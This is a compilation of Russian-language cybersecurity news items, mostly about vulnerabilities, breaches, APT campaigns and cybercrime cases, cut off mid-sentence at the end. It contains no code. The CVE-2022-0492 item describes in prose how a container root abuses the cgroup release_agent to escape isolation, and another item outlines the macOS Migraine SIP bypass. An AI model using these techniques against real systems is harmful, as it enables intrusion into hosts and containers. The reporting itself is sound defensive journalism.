Судья, впрочем, может и не принять рекомендации во внимание и назначить Сингле вплоть до 10 лет лишения свободы. Судьба предприимчивого американца решится 15 феврале 2024 г., на слушаниях, посвященных вынесению приговора.
Трое сотрудников американской сети быстрого питания Hardee's в Мичиган-Сити (штат Индиана) крали данные дебетовых и кредитных карт покупателей. После этого они использовали их для покупки одежды и внесения залога в тюрьме за своих друзей.
Лидером группировки оказалась 35-летняя Кристин Ваншойк (Kristin Vanschoyck), которой помогали 21-летний Принс Арнольд (Prince Arnold) и 20-летний Дэрриен Уорд (Darrien Ward). В течение августа и сентября 2023 года Ваншойк фотографировала карточки людей, которые оплачивали еду в сервисе Hardee's для автомобилистов. После этого она отдавала фото подельникам, которые покупали одежду на онлайн-ресурсах, а также успели перевести от 1000 до 4000 долларов на счета нескольких заключенных местной тюрьмы. Дело в том, что после освобождения арестантам разрешают пользоваться тюремным пластиком на свободе.
Другой предполагаемый заговорщик, имя которого не разглашается, пришел в тюрьму и внес залог за этих же заключенных наличными. Он же забрал у них тюремные карточки. Таким образом, сидельцы получили свободу в награду за участие в схеме, а ее авторы смогли отмыть деньги через пенитенциарную систему США.
Выйти на след группировки из Hardee's удалось из-за жалоб жертв мошенничества. Сопоставив данные об их расходах, предшествовавших потере денег, полицейские поняли, что они все посещали один из тот же фаст-фуд.
source: news.yahoo.com/hardees-employees-michigan-city- allegedly-143257381.html
Сентябрьские обновления для Android устранили 33 уязвимости в операционной системе Google, включая проблему нулевого дня, которая в настоящее время уже используется злоумышленниками.
0-day уязвимость получила идентификатор CVE-2023-35674 и представляет собой недостаток в Android Framework, позволяющий злоумышленникам повысить привилегии. Для эксплуатации бага не требуется взаимодействие с пользователем и какие-либо дополнительные привилегии.
В компании сообщают, что уязвимость уже подвергается «ограниченной, тагретированной эксплуатации», однако подробности об этих атаках пока неизвестны.
Также в составе Android Framework были исправлены три другие проблемы, связанные с повышением привилегий. Наиболее серьезные из них «могут привести к локальному повышению привилегий и не требуют дополнительных привилегий для выполнения», а также какого-либо взаимодействия с пользователем.
Кроме того, сентябрьские обновления исправляют три критических недостатка в компоненте Android System (CVE-2023-35658, CVE-2023-35673, CVE-2023-35681) и один в компонентах Qualcomm с закрытым исходным кодом (CVE-2023-28581).
Уязвимости в Android System могут привести к удаленному выполнению кода (RCE) и тоже не требуют дополнительных привилегий или взаимодействия с пользователем.
В свою очередь, баг в компонентах Qualcomm описывается как нарушение целостности информации в памяти прошивки WLAN. Эта уязвимость может позволить удаленным злоумышленникам выполнить произвольный код, прочитать конфиденциальную информацию или вызывать сбои в работе системы.
Как обычно, компания Google разделила исправления на два уровня: 2023-09-01 и 2023-09-05. Уровень 2023-09-05 содержит все исправления безопасности из первого набора, а также дополнительные исправления для закрытых исходных кодов и компонентов ядра от сторонних разработчиков, которые могут быть актуальны не для всех устройств Android.
Обновления этого месяца касаются версий Android 11, 12 и 13, а также могут затрагивать более старые, неподдерживаемые версии ОС.
Apple не так давно устранила уязвимость в macOS, о которой стало известно благодаря Microsoft. Брешь позволяла обойти System Integrity Protection (защита целостности системы, SIP) и установить в систему «неудаляемую» вредоносную программу.
Кроме того, с помощью выявленного бага условный злоумышленник мог обойти защитные проверки Transparency, Consent, and Control (TCC). Проблема [получила имя Migraine](https://support.apple.com/en- us/HT213758#:~:text=improved%20state%20management.-,CVE-2023-32369,-:%20Jonathan%20Bar%20Or) и идентификатор [CVE-2023-32369](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2023-32369).
По словам Apple, разработчики устранили уязвимость с выходом версий macOS Ventura 13.4, macOS Monterey 12.6.6 и macOS Big Sur 11.7.7. Напомним, что они вышли 18 мая.
System Integrity Protection (SIP) — «родной» защитный механизм операционной системы macOS. Принцип его работы заключается в создании ряда ограничений, чтобы попавшая на устройство вредоносная программа не смогла изменить отдельные директории и файлы.
SIP разрешает менять защищённые компоненты только тем процессам, которые подписаны непосредственно Apple. Отключить SIP нельзя без перезагрузки компьютера в режим восстановления, что подразумевает физический доступ к целевому устройству.
Однако специалисты Microsoft выяснили, что атакующие с правами root могут обойти SIP, используя Ассистента миграции (macOS Migration Assistant). Именно эта встроенная утилита использует демон с возможностью обхода ограничений SIP — com.apple.rootless.install.heritable.
Исследователи показали, как атакующие могут автоматизировать вектор с помощь AppleScript и запустить вредоносный пейлоад после добавления его в список исключений SIP. При этом не требуется перезагружать компьютер.
«Сосредоточившись на системных процессах, подписанных Apple, и com.apple.rootless.install.heritable, мы выяснили, что два дочерних процесса можно изменить и получить таким образом возможность выполнить код с обходом проверок SIP», — [пишет](https://www.microsoft.com/en- us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass- system-integrity-protection/) команда
Microsoft. Эксперты записали [видео](https://www.microsoft.com/en- us/videoplayer/embed/RW14MaR) с демонстрацией вектора атаки.
Стартовал Pwn2Own Vancouver 2022, участники которого должны будут проявить себя в категориях веб-браузера, виртуализации, локального повышения привилегий, серверов, корпоративных коммуникаций и автомобилей.
В первый день которого хакеры взломали операционную систему Microsoft Windows 11 и коммуникационную платформу Teams, продемонстрировали успешную эксплуатацию 16 0-day и сорвали куш в 800 000 долларов США.
Первой полегла Microsoft Teams в категории корпоративных коммуникаций после того, как Гектор Перальта воспользовался неправильной конфигурацией. После чего команда STAR Labs (в составе: Билли Дженг Бинг-Джхонг, Мухаммад Алифа Рамдхан и Нгуен Хоанг Тхок) красиво отработала свою цепочку эксплойтов с нулевым кликом из двух ошибок (внедрение и запись произвольного файла).
Третий раз Microsoft Teams был взломан в третий раз Масато Кинугавой, который использовал цепочку из трех ошибок: внедрение, неправильная конфигурация и выход из песочницы.
Каждая атака с использованием 0-day в Microsoft Teams принесла участника по 150 000 долларов.
Команда STAR Labs смогла дополнительно заработать 40 000 долларов США после за демонстрацию успешного повышения привилегий в ОС Windows 11 с использованием уязвимости Use-After-Free и еще 40 000 долларов США за повышение привилегий в Oracle Virtualbox.
Без внимания хакеров не осталась Mozilla Firefox и Apple Safari, который препарировал Манфред Пол и смог реализовать две ошибки (загрязнение прототипа и неправильная проверка ввода), за что получил вознаграждение в размере 150 000 долларов.
Свои 0-day в Windows 11 и Ubuntu Desktop в ходе первого дня Pwn2Own также показали Марцин Визовски, Team Orca из Sea Security и Кит Йео.
Вообще в период с 18 по 20 мая участники смогут заработать более 1 000 000 долларов наличными и призами, включая автомобили Tesla Model 3 и Tesla Model S. Самая крупная награда назначена за взлом Tesla и составляет 600 000 долларов (бонусом сам автомобиль), что и предстоит хакерам на следующем этапе.
• Source: <https://www.zerodayinitiative.com/blog/2022/5/17/pwn2own- vancouver-2022-the-schedule>
Хакерская группировка Anonymous в одном из своих Twitter-аккаунтов заявила,
что получила доступ к базе данных Сбербанка.
По информации хакеров, в утечке содержатся «электронные адреса 5030 клиентов, номера телефонов, адреса».
К твиту приложен архив с пятью Excel-файлами:
В Сбербанке данную утечку не комментировали.
Напомним, после вторжения России в Украину Anonymous объявили РФ кибервойну.
В конце марта в одном Twitter-аккаунтов хакеры [опубликовали якобы принадлежащие ЦБ РФ 28 ГБ данных](https://forklog.io/hakery-anonymous- opublikovali-dokumenty-banka-rossii/), включая сотни аудиторских заключений и сведения о владельцах банков. Сам российский регулятор информацию о взломе опроверг.
В начале мая связанная с Anonymous хакерская группировка NB65 заявила о получении доступа к базе данных [российской платежной системы QIWI на 10,5 ТБ](https://forklog.io/hakery-zayavili-o-vzlome-qiwi-i-poluchenii- dostupa-k-10-5-tb-dannyh-kompanii/). Компания заверила, что «персональные данные клиентов находятся в безопасности».
Раскрыты детали уязвимости ([CVE-2022-0492](https://security- tracker.debian.org/tracker/CVE-2022-0492)) в реализации механизма ограничения ресурсов cgroups v1 в ядре Linux, которая может использоваться для выхода из изолированных контейнеров. Проблема проявляется начиная с ядра Linux 2.6.24 и устранена в выпусках ядра 5.16.12, 5.15.26, 5.10.97, 5.4.177, 4.19.229, 4.14.266 и 4.9.301.
Уязвимость вызвана логической ошибкой в обработчике файлов release_agent, из- за которой не выполнялись должные проверки при запуске обработчика с полным набором полномочий. Файл release_agent используется для определения программы, выполняемой ядром при завершении процесса в cgroup. Данная программа запускается с правами root и со всеми "capabilities" в корневом пространстве имён. Подразумевалось, что доступ к настройке release_agent имеет только администратор, но на деле проверки ограничивались предоставлением доступа пользователю root, что не исключало изменение настройки из контейнера или пользователем root без прав администратора (CAP_SYS_ADMIN).
Раньше подобная особенность не была бы воспринята как уязвимость, но ситуация изменилась с появлением пространств имён идентификаторов пользователей (user namespaces), которые позволяют создавать в контейнерах отдельных пользователей root, не пересекающихся с пользователем root основного окружения. Соответственно, для атаки достаточно в контейнере, имеющем своего пользователя root в отдельном пространстве идентификаторов пользователей, подключить свой обработчик release_agent, который после завершения процесса будет выполнен с полными привилегиями основного окружения.
По умолчанию cgroupfs монтируется в контейнере в режиме только для чтения, но нет проблем перемонтировать данную псевдофс в режиме записи при наличии прав CAP_SYS_ADMIN или через создание при помощи системного вызова unshare вложенного контейнера с отдельным user namespace, в котором для созданного контейнера доступны права CAP_SYS_ADMIN.
Атака может быть совершена при наличии root-полномочий в изолированном контейнере или при запуске контейнера без флага no_new_privs, запрещающего получение дополнительных привилегий. В системе должна быть включена поддержка user namespaces (по умолчанию включена в Ubuntu и Fedora, но не активирована в Debian и RHEL) и присутствовать доступ к корневому cgroup v1 (например Docker запускает контейнеры в корневом RDMA cgroup). Атака также возможна при наличии привилегий CAP_SYS_ADMIN, в этом случае поддержка user namespaces и доступ к корневой иерархии cgroup v1 не требуется.
Кроме выхода из изолированного контейнера уязвимость также позволяет процессам, запущенным пользователем root без "capabilities" или любым пользователем с правами CAP_DAC_OVERRIDE (для атаки требуется доступ к файлу /sys/fs/cgroup/*/release_agent, который принадлежит root), получить доступ ко всем системным "capabilities".
Отмечается, что уязвимость не может быть эксплуатирована при применении механизмов защиты Seccomp, AppArmor или SELinux для дополнительной изоляции контейнеров, так как Seccomp блокирует обращение к системному вызову unshare(), а AppArmor и SELinux не позволяют примонтировать cgroupfs в режиме записи.
В январе украинские суды вынесли 164 приговора по уголовным делам, связанным с интернет-преступностью. С одной стороны, это более чем на четверть (-28%) меньше, чем в декабре, когда был поставлен рекорд по приговорам, с другой, несмотря на то, что январь является традиционно «тихим месяцем» (из-за обилия праздников), эта цифра – на уровне среднегодового показателя 2021. А это красноречиво свидетельствует о том, что в последние годы мы наблюдаем постоянно растущий уровень интернет-преступности.
Данные собраны в Едином реестре судебных решений и отображают статистику приговоров, вынесенных украинской судебной системой по преступлениям, связанным с интернетом. Среди них – заказ поддельных документов (ст. 358 УК), интернет-мошенничество (ст. 190), покупка и распространение наркотических веществ (ст. 307, 309), несанкционированное вмешательство в работу компьютерных систем (ст. 361) и нарушения против общественной морали (ст. 301).
Прежде всего отметим, что единственная категория преступлений, количество приговоров в которой выросло, в сравнении с «урожайным» декабрем 2021, это взлом компьютерных систем (+75%). А вот больше всего сократилось количество приговоров интернет-мошенникам (-63,7%) и нарушителям общественной морали (-55,6%).
Динамику изменений осуждаемости января, в сравнении с предыдущим месяцем, иллюстрирует диаграмма.
Всего в январе были наказаны 53 гражданина, купивших поддельные документы через интернет. При этом, впервые водительские права перестали быть самой востребованной подделкой. Их доля в январе составила только 43%, тогда как 47% приговоров за поддельные документы, купленные через интернет, связаны с COVID- сертификатами. На третьем месте по популярности – удостоверение тракториста- машиниста (5,7%).
По фактам мошенничества, связанного с интернетом, в январе были вынесены всего 8 приговоров. При этом, по 2 приговора досталось за неправомерное завладение чужим имуществом по поддельным документам (оформление онлайн-кредитов и кража дорогостоящей арендованной техники), торговлю несуществующими товарами через социальную сеть Facebook, а также мошенническое выманивание денег через переписку в социальных сетях от имени фейковых аккаунтов.
За интернет-преступления, связанные с наркотиками, в январе были вынесены 92 приговора. Из них, 48 получили те, кто покупал наркотики через интернет и 44 – те, кто продавал (или их в этом обвинили).
За несанкционированный взлом компьютерных систем получили приговоры 7 граждан. 2 из них связаны с перехватом контроля над чужими аккаунтами Приват24, 1 – за распространение вредоносного ПО под видом читов к популярной онлайн-игре, 1 – за взлом чужих почтовых аккаунтов с похищением персональных и платежных данных, и еще по одному приговору за систематический несанкционированный доступ к беспроводной сети интернет-провайдера и внесение фиктивных данных в официальный реестр eHealth.
Что касается приговоров за преступления против общественной морали, в январе их было вынесено всего 4. Половина из них – за распространение откровенных материалах на тематических сайтах «взрослых» знакомств, 1 – паре любовников, которые транслировали свои интимные шоу через веб-камеру и 1 пользователю социальной сети Вконтакте за публикацию порнографического контента.
Индийская киберпреступная группировка Patchwork (также известная как Dropping Elephant и Chinastrats) использовала новый вариант бэкдора BADNEWS в ходе одной из вредоносных кампаний. В ходе кампании хакеры случайно заразили один из своих компьютеров вредоносным ПО, что позволило исследователям в области кибербезопасности получить представление об их операциях.
Patchwork действует по крайней мере с 2015 года и известна атаками на военных и политических деятелей по всему миру, уделяя особое внимание организациям в Пакистане.
В ноябре и декабре 2021 года, как отметили специалисты из Malwarebytes, хакеры осуществили атаки на исследователей в области молекулярной медицины и биологических наук. Кампания характеризовалась использованием нового варианта трояна для удаленного доступа BADNEWS под названием Ragnatela. Для распространения вредоносных программ злоумышленники использовали фишинговые электронные письма с вредоносными RTF-файлами, отправленные якобы от пакистанских властей.
После установки Ragnatela позволяет злоумышленникам выполнять команды, перечислять файлы в системе, составлять список запущенных приложений, делать снимки экрана, регистрировать нажатия клавиш, загружать дополнительные полезные нагрузки и файлы.
В ходе кампании злоумышленники успешно скомпрометировали несколько организаций, в том числе пользователей в Министерстве обороны Пакистана, Национальном университете обороны в Исламабаде, факультете биологических наук Университета UVAS, Международном центре химических и биологических наук в Университете Карачи и Университете Салима Хабиба.
Из-за ошибки киберпреступники также заразили свою компьютерную систему новым RAT, предоставив ИБ-экспертам возможность узнать более подробную информацию об инструментах, которые использует APT.
«Группировка использует виртуальные машины и VPN для разработки, отправки обновлений и проверки систем своих жертв. Patchwork, как и некоторые другие восточноазиатские APT, не такие сложные, как их российские и северокорейские аналоги», — отметили эксперты.
• Source: <https://blog.malwarebytes.com/threat- intelligence/2022/01/patchwork-apt-caught-in-its-own-web/>
Киберпреступники запустили хорошо подготовленную кампанию, нацеленную на исследователей и разработчиков. В ходе этих атак злоумышленники используют вредоносную версию .NET-приложения dnSpy, которая помогает им устанавливать на компьютер жертвы трояны и вредоносные криптомайнеры.
dnSpy является популярным отладчиком и редактором .NET-сборок, предназначенным для модификации и декомпиляции программ. Исследователи в области кибербезопасности обычно используют dnSpy при анализе .NET-вредоносов.
Несмотря на то что этот дебаггер уже не поддерживается изначальными девелоперами, на GitHub доступен исходный код. Там же можно найти активно разрабатываемую версию, которую любой желающий может клонировать и модифицировать.
Именно этим и воспользовались киберпреступники, создавшие репозиторий GitHub со скомпилированной версией dnSpy. Установившие себе эту версию эксперты получали целый коктейль из вредоносных программ: майнеры, троян Quasar, куча неизвестных пейлоадов и даже софт, модифицирующий буфер обмена и ворующий криптовалюту.
На вредоносную версию dnSpy обратили внимание специалисты MalwareHunterTeam, по словам которых злоумышленники изначально разместили злонамеренный отладчик по адресу https://github[.]com/carbonblackz/dnSpy/, а потом переместили его сюда — https://github[.]com/isharpdev/dnSpy.
Интересно, что злодеи пошли и дальше, создав веб-сайт dnSpy[.]net, который выглядел очень убедительно и профессионально. Сейчас ресурс недоступен, но специалисты успели снять скриншот.
Преступники даже запустили рекламную кампанию, продвигая свой сайт в поисковых выдачах популярных систем: Bing, Yahoo, AOL, Yandex и Ask.com.
Вредоносная версия dnSpy детектируется рядом весьма авторитетных антивирусных движков на площадке VirusTotal.
Cпециалисты по кибербезопасности установили, что злоумышленники похитили средства, завладев ключом администратора.
Криптобиржа BXH Exchange подверглась хакерской атаке, в результате которой
лишилась цифровых активов на $139 млн. Об этом сообщил генеральный директор
компании Нео Ван, [пишет](https://crypto.ru/kriptovalyutnaya-birzha-bxh-
exchange/) crypto.ru.
По словам руководителя криптобиржи, специалисты по кибербезопасности
установили, что злоумышленники похитили средства, завладев ключом
администратора. По одной версии, компьютер сотрудника площадки был заражен
троянской программой, которая позволила хакерам получить доступ к
конфиденциальной информации. Однако не исключается, что к краже причастен один
из работников BXH Exchange.
До выяснения всех деталей хакерской атаки криптобиржа приостановила вывод цифровых активов. По мнению Нео Вана, компании удастся отследить злоумышленника и вернуть деньги. Если же она не сможет это сделать, то компенсирует клиентам потери за счет собственных средств.
Для ускорения поиска злоумышленников BXH Exchange объявила о награде в $1 млн за информацию, которая поможет их найти. Кроме того, компания готова заплатить самим преступникам, если они в ближайшее время вернут украденные цифровые активы.
Подробнее: https://www.securitylab.ru/news/526191.php
Инцидент с SolarWinds подтверждает, что следующий серьезный финансовый кризис может быть вызван кибератакой.
Департамент финансовых услуг штата Нью-Йорк (New York State Department of Financial Services, DFS) опубликовал отчет о влиянии атаки на цепочку поставок SolarWinds, в котором сообщается, что причиной следующего финансового кризиса может стать кибератака.
«Этот инцидент подтверждает, что следующий серьезный финансовый кризис может быть вызван кибератакой. Тот факт, что хакеры одним махом могут получить доступ к тысячам организаций, подчеркивает, что кибератаки угрожают не только отдельным компаниям, но и стабильности финансового сектора в целом», - сообщила инспектор финансовых сервисов Линда Лейсуэлл (Linda Lacewell).
В отчете представлены результаты проведенного DFS расследования мер, принятых нью-йоркскими финансовыми компаниями в ответ на атаку SolarWinds. В нем приводится краткая информация о самой атаке, ответных действиях компаний, регулируемых DFS, и ключевых мерах по предотвращению и смягчению последствий будущих атак на цепочки поставок.
Как было установлено в ходе расследования, подотчетные DFS компании в целом очень быстро отреагировали на атаку. 94% компаний устранили бэкдор из своих IT-систем в течение трех дней с момента сообщения об атаке SolarWinds. Тем не менее, также обнаружилось, что некоторые компании не устанавливают исправления регулярно с целью своевременного предотвращения угроз.
В отчете DFS приводятся следующие меры, необходимые для обеспечения кибербезопасности финансовых организаций:
Разработчики Mozilla выпустили Firefox 85, где исправили критическую уязвимость, связанную с раскрытием информации. Этот баг можно было объединить с другими уязвимостями и таким образом добиться выполнения произвольного кода в уязвимой системе.
Инженеры Mozilla рассказывают, что пока проблема не имеет идентификатора CVE. Эту уязвимость обнаружили эксперты Trend Micro Zero Day Initiative, и она влияет только на Firefox для Windows, другие операционные системы не затронуты.
Баг был связан с работой графической библиотеки Angle, и его описывают как переполнение буфера, из-за которого происходит раскрытие информации. Проблема присутствует в имплементации метода compressedTexImage3D API в WebGL2. Для ее эксплуатации нужно, чтобы злоумышленник вынудил пользователя посетить вредоносную страницу или открыть вредоносный файл.
«Проблема возникает из-за отсутствия надлежащей проверки предоставленных пользователем данных, что может привести к чтению за пределами выделенного буфера. Злоумышленник может использовать эту ошибку в сочетании с другими уязвимостями, в том числе для выполнения произвольного кода в контексте текущего процесса», — объясняют эксперты Zero Day Initiative.
Исправления были включены в состав Firefox 85.0.1 и Firefox ESR 78.7.1. Дополнительные данные о проблеме появится после присвоения CVE.Click to expand...
Источник: xakep.ru/2021/02/11/firefox-angle-bug/
Расследование Follow the Money (FTM) показало, что использование Tinder военнослужащими может быть опасным. Журналисты нашли на платформе профили сотен военных из США, Германии, Франции, Великобритании и других стран. Через приложение удалось узнать их личные данные, места проживания, а также отслеживать передвижения между военными базами. Эксперты считают, что такие приложения представляют серьёзную угрозу безопасности.
FTM создали три фейковых аккаунта в Tinder и «перемещали» их по разным военным базам. Благодаря методу триангуляции удалось вычислить местоположение военных и даже их маршруты перемещений.
Приложение также позволило отслеживать перемещения пользователей, используя данные о расстоянии между аккаунтами. Например, один американский военный, работающий в сфере противоракетной обороны, был замечен на базе Рамштайн в Германии, затем в Испании и снова в Германии. Подобные случаи выявлены на базах в Литве, Эстонии, Мали и других странах.
Многие военные сами упрощают задачу злоумышленникам. В их профилях указываются должности, а фото в форме или на фоне техники позволяют легко их идентифицировать. Некоторых сотрудников удалось найти даже через другие социальные сети, такие как LinkedIn и Instagram*. Там журналисты обнаружили адреса, даты рождения, друзей и коллег.
Эксперты предупреждают, что такая информация может быть использована спецслужбами других стран для шантажа или вербовки. Например, детали из профиля могут стать основой для установления доверия и получения секретных данных. Кроме того, можно отслеживать активность на базах: если резко увеличивается число пользователей, это может указывать на учения или другие важные события.
Защита данных пользователей Tinder остаётся спорным вопросом. Несмотря на заверения компании о мерах безопасности, исследование FTM показывает, что приложение остаётся уязвимым. Эксперты настаивают на необходимости пересмотра политики безопасности, чтобы снизить риски утечек информации, особенно в контексте военных и правительственных работников.
Исследование FTM показывает, что проблема носит международный характер. Tinder остаётся популярным, а значит, риски сохраняются. Специалисты подчёркивают, что такие данные могут представлять опасность не только для отдельных военных, но и для безопасности целых государств.
Это не первый случай, когда приложения приводят к утечке данных. Ранее из-за фитнес-приложений были раскрыты местоположения секретных военных баз. Однако многие армии, включая армию США, до сих пор не запретили использование Tinder. В некоторых странах, например, в Нидерландах, ограничения касаются только рабочих телефонов, а личные устройства остаются без контроля.
Кроме того, расследование французской газеты Le Monde выявило серьезные риски безопасности Джо Байдена, Дональда Трампа и Камалы Харрис. Движения их охранников отслеживаются через популярное фитнес-приложение Strava, используемое сотрудниками охраны, в том числе и американской Секретной службы.
Кроме того, Strava способно раскрывать персональные данные пользователей незнакомцам, находящимся поблизости. Утечка пользовательской информации была вызвана настройками конфиденциальности по умолчанию в функции приложения. А в 2023 году специалисты с помощью функции тепловой карты приложения Strava смогли идентифицировать домашние адреса пользователей.
Источник: журнал Хакер.

](https://xakep.ru/2024/08/13/office-ntlm-hashes/)
Компания Microsoft предупредила об уязвимости, затрагивающей различные версии Office, которая может раскрыть хеши NTLM удаленному злоумышленнику.
 xakep.ru
Компания Microsoft [предупредила](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2024-38200) об уязвимости, затрагивающей различные версии Office, которая может раскрыть хеши NTLM удаленному злоумышленнику.
Проблема получила идентификатор CVE-2024-38200 и описывается как уязвимость раскрытия информации, позволяющая неавторизованным лицам получить доступ к защищенным данным. Сообщается, что баг затрагивает несколько 32- и 64-битных версий Office, включая Office 2016, Office 2019, Office LTSC 2021 и Microsoft 365 Apps for Enterprise.
Хотя по оценке Microsoft эксплуатация CVE-2024-38200 считается маловероятной, MITRE оценивает проблему и иначе и предупреждает, что вероятность эксплуатации уязвимостей такого типа обычно высока.
«В случае веб-атаки злоумышленник может создать сайт (или использовать взломанный сайт, который принимает и размещает предоставленный пользователями контент), содержащий специально подготовленный файл, предназначенный для эксплуатации уязвимости, — сообщают в Microsoft. — После этого злоумышленнику придется убедить пользователя перейти по ссылке (как правило, с помощью сообщения в электронном письме или мессенджере), а затем убедить его открыть специально подготовленный файл».
Click to expand...
Представители Microsoft сообщили, что компания уже разрабатывает патчи для устранения этой ошибки, но пока дата их выхода не названа. Однако пользователям доступен временный фикс, выпущенный в рамках Feature Flighting 7/30/2024.
«Пользователи всех поддерживаемых версий Microsoft Office и Microsoft 365 уже защищены. Пользователям следует обновить версию до обновления от 13 августа 2024 года, чтобы получить исправление», — сообщают разработчики.
Click to expand...
Также в компании отмечают, что защититься от CVE-2024-38200 можно заблокировав исходящий NTLM-трафик на удаленных серверах, хотя это может помешать легитимному доступу к удаленным серверам, которые используют NTLM- аутентификацию.
Хотя в Microsoft еще не раскрыли никаких дополнительных подробностей об уязвимости, опубликованный компанией бюллетень указывает на то, что проблему можно использовать для принудительного установления NTLM-соединения, например, с общим ресурсом SMB на сервере злоумышленника. В таких случаях Windows передает NTLM-хеши пользователя, включая хешированный пароль, который злоумышленники могут похитить.
В Таиланде задержаны сотрудники российских фирм, занимавшиеся мошенничеством.
В Таиланде полиция устроила обыски в офисах семнадцати российских компаний,
которые подозреваются в отмывании денег на сумму 468 миллионов рублей.
Сотрудники фирм использовали как минимум десять схем вывода денег. Некоторые из них открыли конторы, где печатали фейковые документы, в том числе разрешения на работу в Таиланде и ведение бизнеса. Выйти на преступников получилось благодаря тому, что местный житель, выдававший себя за чиновника управления электроэнергетики, был задержан полицией.
Он занимался установкой специальных программ на телефоны горожан, получал доступ к их деньгам, пересылал их на российские счета, а затем обналичивал. Мошенник успел украсть около 1,3 миллиона рублей. По данным правоохранителей, в картеле числилось 38 компаний, но следствие полагает, что их число может оказаться гораздо больше.
Инвестор из Уэльса, который десять лет назад случайно утратил 8,000 биткоинов, выбросив жесткий диск с кошельком в мусор, теперь угрожает подать в суд на местный совет, контролирующий свалку, на которой оказался диск. Его претензии могут достигать $557 млн.
Ньюпортский городской совет (NCC) неоднократно отказывал Джеймсу Хауэллсу в разрешении рыть свалку в поисках его биткоинов. Однако, как [сообщает Telegraph](https://www.telegraph.co.uk/money/consumer-affairs/bitcoin- investor-who-lost-164m-in-landfill-to-sue-his-local/%22) , Хауэллс готовится подать иск к совету, пытаясь прекратить любые работы на свалке.
Предполагаемый иск направлен на получение £446 млн ($557 млн) в качестве компенсации, что соответствует максимальной зарегистрированной стоимости утерянных им биткоинов. Подачей иска Хауэллс угрожает обанкротить NCC, заявляя, что недавно объявленный банкротом Бирмингемский городской совет "не будет единственным советом под управлением Лейбористской партии, который обанкротится в этом году".
В открытом письме к совету от 4 сентября Хауэллс требовал разрешения на начало раскопок на свалке к 18 сентября, а также проведение юридического обзора законности решений совета в ходе всего инцидента с биткоинами.
Джеймс потерял BTC в 2013 году после уборки в своем старом офисе, выбросив кошелек с биткоинами. 8,000 биткоинов оценивались в £446 млн в свое время и примерно в £166 млн ($207 млн) сегодня.
Совет на протяжении 10 лет упорно отказывал Хауэллсу в возможности восстановить утерянные биткоины, утверждая, что они "не могут находиться на нашей свалке".
Представитель совета отметил, что экскавация "не возможна по нашему экологическому разрешению", и что такие работы будут иметь огромное отрицательное воздействие на окружающую территорию.
Департамент информационных технологий Правительства Москвы ввёл в строй отечественную площадку для совместной разработки ПО - Mos.Hub, позиционируемую как "российское сообщество разработчиков программного кода". Платформа основана на московском городском репозитории программного обеспечения, который развивается более 10 лет. Площадка даст возможность делиться собственными разработками и повторно использовать отдельные элементы городских цифровых сервисов Москвы. После регистрации имеется возможность создания своих групп и публичных или приватных проектов. На момент написания новости существующие на Mos.Hub публичные репозитории пока ограничиваются двумя тестовыми проектами (дополнение: спустя сутки появилось несколько сотен проектов).
Заявлено, что проект Mos.Hub развивается в качестве аналога зарубежных репозиториев, таких как GitHub и GitLab, а вся информация, размещённая в Mos.Hub, хранится в защищённом городском центре обработки данных на территории России. При этом беглый осмотр кода основной страницы указывает на то, что система построена на базе открытой платформы GitLab, разрабатываемой американской компанией GitLab Inc.
Для показа аватаров пользователей на всех страницах осуществляется загрузка картинок с сайта gravatar.com (принадлежит американской компании Automattic Inc.), что позволяет его владельцам отслеживать активность пользователей сервиса.
На странице также имеется JavaScript-код для обращения к облачному сервису Google Recaptcha.
source: mos.ru/news/item/124351073
Расслабляться рано – злоумышленники планируют заняться криптоджекингом.
Хакеры, стоявшие за разработкой вымогательского ПО AstraLocker , сообщили о прекращении вымогательской деятельности. Злоумышленники планируют переключиться на криптоджекинг.
Свои слова хакеры подкрепили действиями и загрузили ZIP-архив с дешифраторами на VirusTotal. Специалисты BleepingComputer проверили архив и протестировали один из дешифраторов на файлах, зашифрованных в ходе недавней кампании AstraLocker.

Дешифраторы AstraLocker.
" Это было весело, но всё веселье когда-нибудь заканчивается. Я закрываю операцию, расшифровщики находятся в zip-файлах, чистые. Я вернусь", – сказал один из разработчиков AstraLocker. " С вымогательским ПО я пока завязал. Сейчас планирую заниматься криптоджекингом, лол".
И хотя разработчики не раскрыли причину остановки работы AstraLocker, существует мнение, что группировка привлекла излишнее внимание правоохранительных органов.

Демонстрация работы дешифратора AstraLocker.
Универсальный дешифратор для вымогательского ПО AstraLocker пока находится в
стадии разработки. Известно, что им занимается компания Emsisoft, помогающая
жертвам вымогателей восстанавливать данные.
За пару дней до ухода злоумышленники успели провести дерзкую операцию ,
используя обновленную версию своего вымогательского ПО. Хакеры заражали
пользователей через почтовые вложения, используя примитивные инструменты для
быстрой и прибыльной атаки.
The attack had an immediate effect on people's lives. Health care systems went offline and printers spewed out garbage, as first reported by security journalist Brian Krebs . Since then patients have complained of delays in getting treatment and the CCSS has warned parents whose children were undergoing surgery that they may have trouble locating their kids . The health service has also begun printing discontinued paper forms .
By June 3, CCSS had declared an “institutional emergency,” with local reports claiming that [759 of the 1,500](https://www.nacion.com/el-pais/salud/hackeo-en-ccss-entidad-procura- asegurar-limpieza/R43S6MZZAFHSZEN4ZR32WUGYS4/story/) servers and 10,400 computers have been impacted. Assperson for CCSS says hospital and emergency services are now running normally and the efforts of its spoke staff have maintained care. However, those seeking medical care have faced significant disruptions: 34,677 appointments have been rescheduled, as of June 6. (The figure is 7 percent of total appointments; the CCSS says 484,215 appointments have gone ahead.) Medical imaging, pharmacies, testing laboratories, and operating theaters are all facing some disruption.

](https://www.wired.com/story/costa-rica-ransomware-conti/amp)
A pair of ransomware attacks crippled parts of the country—and rewrote the rules of cybercrime.
www.wired.com
November 15, 2021 Ravie
Lakshmanan

A new analysis of website fingerprinting (WF) attacks aimed at the Tor web
browser has revealed that it's possible for an adversary to glean a website
frequented by a victim, but only in scenarios where the threat actor is
interested in a specific subset of the websites visited by users.
"While attacks can exceed 95% accuracy when monitoring a small set of five popular websites, indiscriminate (non-targeted) attacks against sets of 25 and 100 websites fail to exceed an accuracy of 80% and 60%, respectively," researchers Giovanni Cherubin, Rob Jansen, and Carmela Troncoso said in a newly published paper.
Tor browser [offers](https://thehackernews.com/2021/05/over-25-of-tor-exit- relays-are-spying.html) "unlinkable communication" to its users by routing internet traffic through an overlay network, consisting of more than six thousand relays, with the goal of anonymizing the originating location and usage from third parties conducting network surveillance or traffic analysis. It achieves this by building a circuit that traverses via an entry, middle, and exit relay, before forwarding the requests to the destination IP addresses.

On top of that, the requests are encrypted once for each relay to further
hinder analysis and avoid information leakage. While the Tor clients
